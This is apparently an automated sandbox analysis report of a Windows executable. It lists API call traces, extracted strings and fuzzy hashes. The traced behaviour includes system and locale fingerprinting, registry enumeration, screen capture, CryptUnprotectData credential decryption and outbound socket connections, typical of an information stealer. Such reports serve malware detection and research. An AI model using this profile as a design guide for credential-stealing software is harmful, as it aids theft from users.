                  • GetWindowRect.USER32 ref: 0041B58F
                  • GetSystemInfo.KERNEL32(?), ref: 0041B686
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B744
                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000001), ref: 0041B867
                  • GetTimeZoneInformation.KERNEL32(?), ref: 0041B9D9
                  • GetKeyboardLayoutList.USER32(00000010,?), ref: 0041BCE5
                  • GetLocaleInfoW.KERNEL32(?,00000002,?,000000FF,00000010), ref: 0041BD2E
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041BF4C
                  • Process32First.KERNEL32(00000000,?), ref: 0041BF92
                  • Process32Next.KERNEL32 ref: 0041C02D
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 0041C1AF
                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C1FE
                  • memset.MSVCRT ref: 0041C24E
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C273
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00000000,00020019,?), ref: 0041C7CA
                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C836
                  • memset.MSVCRT ref: 0041C8D1
                  • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0041C8F6
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00000000), ref: 0041CB9A
                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000800,80000001,00000000,00000000,00000001,00000000), ref: 0041CC23
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000800,80000001,00000000,00000000,00000001,00000000), ref: 0041CC38
                  • CloseHandle.KERNEL32(?), ref: 0041D3FB
                  • CloseHandle.KERNEL32(?), ref: 0041DB7D
                  • CloseHandle.KERNEL32(?), ref: 004183F9
                    • Part of subcall function 0040D33A: memset.MSVCRT ref: 0040D4F3
                    • Part of subcall function 0040D33A: SetLastError.KERNEL32(00000000), ref: 0040D551
                    • Part of subcall function 0040D33A: GetEnvironmentVariableW.KERNEL32(00000200,?,00000200,00000000), ref: 0040D55C
                    • Part of subcall function 00422783: memcpy.MSVCRT ref: 004227A7
                  • CloseHandle.KERNEL32(?), ref: 00418405
                  • CloseHandle.KERNEL32(?), ref: 0041841A
                  • CloseHandle.KERNEL32(?), ref: 0041842E
                  • GetProcessHeap.KERNEL32 ref: 0041E9E1
                  • GetSystemMetrics.USER32 ref: 0041E9E8
                  • GetSystemMetrics.USER32 ref: 0041E9F3
                  • GetDC.USER32(00000000), ref: 0041EA50
                  • GetCurrentObject.GDI32(00000000,00000007), ref: 0041EA5C
                  • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,?,?,?,0000004D,0000004C), ref: 0041EA70
                  • DeleteObject.GDI32(00000000), ref: 0041EA88
                  • CreateCompatibleDC.GDI32(?), ref: 0041EAE5
                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 0041EB03
                  • SelectObject.GDI32(00000000,00000000), ref: 0041EB0A
                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041EB2A
                  • closesocket.WS2_32(?), ref: 0041ECD1
                  • closesocket.WS2_32(?), ref: 0041EE40
                    • Part of subcall function 0042A63B: shutdown.WS2_32(?,00000002), ref: 0042A648
                  • memset.MSVCRT ref: 0041F851
                    • Part of subcall function 00420300: GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420308
                    • Part of subcall function 00420300: HeapFree.KERNEL32(00000000,00000000,?,?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?), ref: 0042031B
                  • SetLastError.KERNEL32(00000000), ref: 0041F8C4
                  • GetTempPathW.KERNEL32(00000200,?,00000000), ref: 0041F8CB
                  • GetLastError.KERNEL32(00000200,00000002,00000000,00000200,?,00000000), ref: 0041F8D6
                  • GetLastError.KERNEL32(00000200,?,00000000), ref: 0041F8E7
                  • CloseHandle.KERNEL32(00000000), ref: 0041FC24
                  • LoadLibraryA.KERNEL32(?,00000000), ref: 0041FC5D
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041FC6A
                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0041FD63
                  • closesocket.WS2_32(?), ref: 0041FE88
                  • GetLastError.KERNEL32(00000200,00000002,00000000,00000200,?,00000000), ref: 0042015A
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Close$Handle$AddressProc$ErrorLast$memset$CreateLibraryLoad$InfoObjectOpenQuery$EnumHeapNameProcessSystemclosesocket$FileLocaleMetricsProcess32ValueWindow$CompatibleComputerCurrentDefaultDeleteDesktopDevicesDisplayDownloadEnvironmentFirstFreeGlobalInformationKeyboardLayoutListMemoryModuleMutexNextPathRectSectionSelectSnapshotStatusTempTimeToolhelp32UserVariableZonememcpyshutdown
                  • String ID: b9$assertion failed: key != 0WakeConditionVariable$"SomeNone$$zC$..\\?\.\UNC\Windows stdio in console mode does not support writing non-UTF-8 byte sequences$53@$<vC$<vC$@$@pC$GetSystemTimePreciseAsFileTime$Ow(T$\data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive$\xC$dresses$failed to write whole buffer:$kernel32.dll$p0D$<@
                  • API String ID: 4233855127-4045763725
                  • Opcode ID: 4b24dc7c212a0d432420b118860d6e6e31ea1172a2f035c1e9c838b3c45a3f94
                  • Instruction ID: 61271da333d6c0335346d8ad7565baa6346cf4c4da69aae8c8a6070b7f0dad69
                  • Opcode Fuzzy Hash: 4b24dc7c212a0d432420b118860d6e6e31ea1172a2f035c1e9c838b3c45a3f94
                  • Instruction Fuzzy Hash: AD245D716087818BD335DF24C891BDBB7E5FFC9304F10492EE48A9B291DB78A945CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • memset.MSVCRT ref: 0042BE2F
                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0042B751,?), ref: 0042BE39
                  • memcpy.MSVCRT ref: 0042BEA7
                  • memcpy.MSVCRT ref: 0042BEF1
                  • GetLastError.KERNEL32(?,?,?,?,?,?,0042B751,?), ref: 0042BF1C
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 0042992F
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 0042994A
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 00429982
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 00429A25
                  • memcpy.MSVCRT ref: 0042BFCD
                  • memcpy.MSVCRT ref: 0042C003
                  • memcpy.MSVCRT ref: 0042C0FC
                  • memcpy.MSVCRT ref: 0042C235
                    • Part of subcall function 00429821: memset.MSVCRT ref: 004299A9
                    • Part of subcall function 00429821: FindNextFileW.KERNEL32(?,?), ref: 004299C4
                    • Part of subcall function 00429821: GetLastError.KERNEL32(?,?), ref: 004299F0
                  • memcpy.MSVCRT ref: 0042C35F
                  • memmove.MSVCRT ref: 0042C62A
                  • memcpy.MSVCRT ref: 0042C8B4
                  • memcpy.MSVCRT ref: 0042C933
                  • memcpy.MSVCRT ref: 0042C9B7
                  • memmove.MSVCRT ref: 0042C9FE
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,0042B751,?), ref: 0042CB07
                  • memcpy.MSVCRT ref: 0042CCBC
                  • memcpy.MSVCRT ref: 0042CD93
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: memcpy$ErrorFileFindLastmemmovememset$CloseFirstHandleNext
                  • String ID:
                  • API String ID: 999017993-0
                  • Opcode ID: b3b0615f26c499943fa6eba0d94bd0ff6bc9c337c9b0f635e8b7767b7750fc94
                  • Instruction ID: ac13f3e1733af14886f6c64beaa8a3535c0925d813efdd87042ab05e0ad990bd
                  • Opcode Fuzzy Hash: b3b0615f26c499943fa6eba0d94bd0ff6bc9c337c9b0f635e8b7767b7750fc94
                  • Instruction Fuzzy Hash: D3B27971A083518FD734CF14D480BAFB7E2BFC8314F508A2EE98997251DB74A946CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • Sleep.KERNEL32(000003E8), ref: 0040EBAA
                  • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 0040EE57
                  • WSAGetLastError.WS2_32 ref: 0040EE66
                  • memcpy.MSVCRT ref: 0040EEFA
                  • freeaddrinfo.WS2_32(?), ref: 0040EF8C
                  Strings
                  • data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive, xrefs: 0040EDFE
                  • :, xrefs: 0040EA8E
                  • invalid socket addressinvalid port valuestrings passed to WinAPI cannot contain NULsinvalid utf-8: corrupt contentsinvalid utf-8stream did not contain valid UTF-8, xrefs: 0040EB2E
                  • could not resolve to any addresses, xrefs: 0040ED63
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ErrorLastSleepfreeaddrinfogetaddrinfomemcpy
                  • String ID: :$could not resolve to any addresses$data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive$invalid socket addressinvalid port valuestrings passed to WinAPI cannot contain NULsinvalid utf-8: corrupt contentsinvalid utf-8stream did not contain valid UTF-8
                  • API String ID: 1841633148-1692676443
                  • Opcode ID: 65545ec4360f278f7fce114d2124e79559e53257a287fb675380f28c28b50d81
                  • Instruction ID: cca18a1fbea1619a5e1ceafe989a7d84fdd2c2645a0103c7d7792ff35d755b2d
                  • Opcode Fuzzy Hash: 65545ec4360f278f7fce114d2124e79559e53257a287fb675380f28c28b50d81
                  • Instruction Fuzzy Hash: A9B25D71A087818FD324DF25C4817ABF7E1FFC9314F108A2EE5899B291DB749989CB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                  • String ID: `PC
                  • API String ID: 1672962128-3807928140
                  • Opcode ID: 8748a492f4925a44f451fa2f04ad84413a0df61c771f2ca5b269b17df2be296d
                  • Instruction ID: e3ad7991db59e3ca4ea8c649164211cf4c5ce35165762688abb2758fda9ae006
                  • Opcode Fuzzy Hash: 8748a492f4925a44f451fa2f04ad84413a0df61c771f2ca5b269b17df2be296d
                  • Instruction Fuzzy Hash: F471A174A042008FDB14DFA5E8817AABBF0FB49705F50453EE944AB3A1D77DAD44CB8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                  • String ID: `PC
                  • API String ID: 738594520-3807928140
                  • Opcode ID: e540b2c3a16b03490bd264bd0621dc4acd35348cbb3f5a7c44d01cb6ccdfbd0d
                  • Instruction ID: e6e361ffeaa0da957a2ac7bb49f58499f13ba3656c4e80dd41b8bf274b0af86b
                  • Opcode Fuzzy Hash: e540b2c3a16b03490bd264bd0621dc4acd35348cbb3f5a7c44d01cb6ccdfbd0d
                  • Instruction Fuzzy Hash: 7B413CB8A043008FDB10EF65E881799BBF0FB89709F10853ED98497361D778A944CF5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                  • String ID: `PC
                  • API String ID: 1672962128-3807928140
                  • Opcode ID: 4a727354bd41790a88e3d2b1f162d7165e1dd398ae18037a40eba07a4ee7b51e
                  • Instruction ID: c58e9f807da62276afc82b5e192ce8ae9b5dccad1d061ac5ce7a3b601894ad4f
                  • Opcode Fuzzy Hash: 4a727354bd41790a88e3d2b1f162d7165e1dd398ae18037a40eba07a4ee7b51e
                  • Instruction Fuzzy Hash: 1A517C74A002008FDB10DF69E88179ABBF0FB89709F10453EE9449B361D778A944CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040BD8F
                  • memmove.MSVCRT ref: 0040BDBF
                  • LocalFree.KERNEL32(?,00000000,00000000,?), ref: 0040BDCB
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectmemmove
                  • String ID: .<@
                  • API String ID: 1275420628-3367864983
                  • Opcode ID: bab0380084628facf5d9df60220285807e6333fe18211a03b14505c613c24b62
                  • Instruction ID: 1e872254c75208275c4192c08c24987378cf00c31cc8f7bee8a763e4ad058cbb
                  • Opcode Fuzzy Hash: bab0380084628facf5d9df60220285807e6333fe18211a03b14505c613c24b62
                  • Instruction Fuzzy Hash: 6FD16871908B459FC311CF25C48065BBBF5FFC9358F208A1EE4896B251DB74E986CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,00429C99,?,?,?,?,?,?,?,?,0040238E), ref: 0042937F
                  • memset.MSVCRT ref: 004293C4
                  • DeviceIoControl.KERNEL32 ref: 004293E5
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ControlDeviceFileHandleInformationmemset
                  • String ID:
                  • API String ID: 2311885070-0
                  • Opcode ID: 574e9711f156348d04f33f3a86782e6b3470dce432817fa0db677d24d0efa13c
                  • Instruction ID: 02c60c0b0feb5c7c9a033baeff54817eea31a05f097ce1dab99b4ab53af41aed
                  • Opcode Fuzzy Hash: 574e9711f156348d04f33f3a86782e6b3470dce432817fa0db677d24d0efa13c
                  • Instruction Fuzzy Hash: 5C4114B0A087009FD324CF1AD481B6AFBF5FFC8314F50892EE98A87750D775A8458B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • recv.WS2_32(?,?,7FFFFFFF,00000000), ref: 0042A68F
                  • WSAGetLastError.WS2_32(?,?,0040F340,00000000,?), ref: 0042A69E
                  • WSAGetLastError.WS2_32(?,?,0040F340,00000000,?), ref: 0042A6B2
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: ErrorLast$recv
                  • String ID:
                  • API String ID: 316788870-0
                  • Opcode ID: 469c0b2d10d8660a71951af34ec0366f4c448b8a5f8c1a0f3310c9dc4ebbc232
                  • Instruction ID: f3b235f5448d2b4cece8ab5347d9eabcd5e59dbbeff251ebc60d087194793d7b
                  • Opcode Fuzzy Hash: 469c0b2d10d8660a71951af34ec0366f4c448b8a5f8c1a0f3310c9dc4ebbc232
                  • Instruction Fuzzy Hash: 9BF082716106106BD724AAB4980576672E4DB48724F208A2FE8AAC72D1DA78E4504A5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00429771: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 0042979F
                  • memmove.MSVCRT ref: 00412E06
                  • memmove.MSVCRT ref: 00412F12
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: memmove$FilePointer
                  • String ID:
                  • API String ID: 2310539373-0
                  • Opcode ID: da17f3e1e8571fa25a23a677538bb4f4eb63e68dcd72a932e0b956170cb54914
                  • Instruction ID: 1ed6ac2d24935139b4f6290924fc40b157a19ad7a962c29fe3751524382fbe52
                  • Opcode Fuzzy Hash: da17f3e1e8571fa25a23a677538bb4f4eb63e68dcd72a932e0b956170cb54914
                  • Instruction Fuzzy Hash: 68823771A08781CFC724CF25C5907ABB7E1BFC9315F10892EE4899B351DB789986CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: memcpy$ErrorLast$FileFindNextmemset
                  • String ID:
                  • API String ID: 2231764315-0
                  • Opcode ID: ddbc644feed9f87f5997584ce074c5d54684d658f9ec871ddfde146ce0829858
                  • Instruction ID: 9e87e96f9dcd3ddcf5ca2db65e65425cf52b5a3825ee5d437b37d93a802ed792
                  • Opcode Fuzzy Hash: ddbc644feed9f87f5997584ce074c5d54684d658f9ec871ddfde146ce0829858
                  • Instruction Fuzzy Hash: 03610971508B449FC321EF25D885AABB3E4FFC9304F148A2EE88D4B252DB34A845CB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • WSASocketW.WS2_32(00000002,00000001,00000000,00000000,00000000,00000081), ref: 00402E15
                  • connect.WS2_32(00000000,?,00000010), ref: 00402E32
                  • closesocket.WS2_32(00000000), ref: 00402E61
                  • WSAGetLastError.WS2_32 ref: 00402E6B
                  • WSASocketW.WS2_32(00000002,00000001,00000000,00000000,00000000,00000001), ref: 00402E8C
                  • SetHandleInformation.KERNEL32(00000000,00000001,00000000,00000002,00000001,00000000,00000000,00000000,00000001), ref: 00402E9D
                  • closesocket.WS2_32(00000000), ref: 00402ED8
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Socketclosesocket$ErrorHandleInformationLastconnect
                  • String ID:
                  • API String ID: 2466617131-0
                  • Opcode ID: 4721a1dab41b90c94848229a87c6aca418958c3b85086d81bde12f1b014a1916
                  • Instruction ID: 4da0d469031575bf6afc84133db2019047ac78350077b27a374ff3ffae34df55
                  • Opcode Fuzzy Hash: 4721a1dab41b90c94848229a87c6aca418958c3b85086d81bde12f1b014a1916
                  • Instruction Fuzzy Hash: BB41F671A402119FEB249A24CD85B7FB7A5EB85720F24853FF904AF3C1C6B89C42D699
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,?,00422892,?,?,?,?,?,?,?,00428202,?,?), ref: 00420343
                  • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00422892,?,?,?,?), ref: 0042034D
                  • GetProcessHeap.KERNEL32(?,?,?,?,00422892,?,?,?,?,?,?,?,00428202,?,?), ref: 00420358
                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,00422892,?,?,?,?,?,?,?,00428202), ref: 00420361
                  • memcpy.MSVCRT ref: 00420385
                  • GetProcessHeap.KERNEL32(?,?,00428105,?,?,?,?,?,?,00401D64,?,?,?,00000000,?), ref: 0042038D
                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,00428105,?,?,?,?,?,?,00401D64,?,?,?), ref: 00420398
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Heap$Process$Alloc$Freememcpy
                  • String ID:
                  • API String ID: 3452495767-0
                  • Opcode ID: ac4ac381551121c931df6672444570e0a4e36a02780e552e3e19d529a7b95dbf
                  • Instruction ID: 6ae3fd09a152b551b1e8bb5d74d6f0dd60c46e3abb93c7a0b1baaa32477b8f68
                  • Opcode Fuzzy Hash: ac4ac381551121c931df6672444570e0a4e36a02780e552e3e19d529a7b95dbf
                  • Instruction Fuzzy Hash: 8201D6717053146FD610AAB6ADC1F9F76DC9BC935CF01103EBA4593243E56CA804417D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: malloc$_cexitmemcpystrlen
                  • String ID:
                  • API String ID: 701060287-0
                  • Opcode ID: 88c6f0e44087c42403907007df445f3ac44e41c076fab1344ab4ff46b99ced03
                  • Instruction ID: a5091d358589167bcc892d268cda26a59ee3b23989f35f5bfa3aa8e21b73ff37
                  • Opcode Fuzzy Hash: 88c6f0e44087c42403907007df445f3ac44e41c076fab1344ab4ff46b99ced03
                  • Instruction Fuzzy Hash: BE3157B9A003018FDB20DF65E881699BBF1FB89705F14463EE944A7365E739AA04CF49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: malloc$_cexitmemcpystrlen
                  • String ID:
                  • API String ID: 701060287-0
                  • Opcode ID: bb86dfd7b69ba7c36eb607123199522142c6712be6e241e8cbe65746e5630a84
                  • Instruction ID: 8a2ed71903d27caabf9edf1cde80f78ce5cfed448826e86bc111cfa286e89d17
                  • Opcode Fuzzy Hash: bb86dfd7b69ba7c36eb607123199522142c6712be6e241e8cbe65746e5630a84
                  • Instruction Fuzzy Hash: 6B3136B8A00301CFDB10DF65E880699BBF0FB89705F10463ED944A7325E738AA04CF49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E679
                  • RegQueryValueExW.ADVAPI32(0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E6BF
                  • RegCloseKey.ADVAPI32(0041C3A9,0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E6D4
                  • RegCloseKey.ADVAPI32(0041C3A9,0041C3A9,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000001,0041C3A9), ref: 0040E708
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Close$OpenQueryValue
                  • String ID:
                  • API String ID: 1607946009-0
                  • Opcode ID: 743936c842a786ad2a5da54fc67c09d4164f2274488d099469a9d6c534fc557b
                  • Instruction ID: a44202bb6a49ac67f1cef80c200b490149426153e4840dbe980d44e1d8dbdd80
                  • Opcode Fuzzy Hash: 743936c842a786ad2a5da54fc67c09d4164f2274488d099469a9d6c534fc557b
                  • Instruction Fuzzy Hash: 742197B1A102056BDB10ABA6DC41BBEB7B9FFC4314F10482BB504772C1DBB86D15CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,00415DD5), ref: 0040E756
                  • RegQueryValueExW.ADVAPI32(00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E79C
                  • RegCloseKey.ADVAPI32(00415DD5,00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E7B1
                  • RegCloseKey.ADVAPI32(00415DD5,00415DD5,00000000,00000000,00000000,00000000,00000800,80000002,00000000,00000000,00000101,00415DD5), ref: 0040E7E5
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Close$OpenQueryValue
                  • String ID:
                  • API String ID: 1607946009-0
                  • Opcode ID: 45d28332702032414850172379102ce3757928cf8eed56531f3a4c49c45bef86
                  • Instruction ID: 5d8770f4f6a8374761416f3d94454b6ed6949bd519d5bfc513fd254f96fe1e4f
                  • Opcode Fuzzy Hash: 45d28332702032414850172379102ce3757928cf8eed56531f3a4c49c45bef86
                  • Instruction Fuzzy Hash: 432153B1A102066BDB10ABA6CC51BBEB7B9FFC4714F10442AA514772C1DBB86D15CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ReadFile.KERNEL32(?,?,o!@,o!@,00000000,?,0040216F,?,0040B598,?,?,?,0040B598,?,00000001,?), ref: 004292F8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: FileRead
                  • String ID: o!@$o!@
                  • API String ID: 2738559852-3792276911
                  • Opcode ID: da2feb4895eef9f23880edc8d6b8fe5b6ec472b82ca4fb099168d28bce969efe
                  • Instruction ID: 39a0d257009ff8347c7723309ec1ac67790cfc9eace24e320030176d9e507d96
                  • Opcode Fuzzy Hash: da2feb4895eef9f23880edc8d6b8fe5b6ec472b82ca4fb099168d28bce969efe
                  • Instruction Fuzzy Hash: DB019271A003159BDB10DF55E401BBEB7F5EF84721F50840EE84567380D7B86D418A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?,?,?,004281C2), ref: 004228E4
                  • HeapAlloc.KERNEL32(00000000,00000008,?,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?), ref: 004228ED
                  • GetProcessHeap.KERNEL32(?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?,?,?,004281C2), ref: 0042290B
                  • HeapAlloc.KERNEL32(00000000,00000008,?,?,?,?,?,004228AF,00000000,?,?,?,?,?,00428202,?), ref: 00422914
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp Download File
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp Download File
                  Similarity
                  • API ID: Heap$AllocProcess
                  • String ID:
                  • API String ID: 1617791916-0
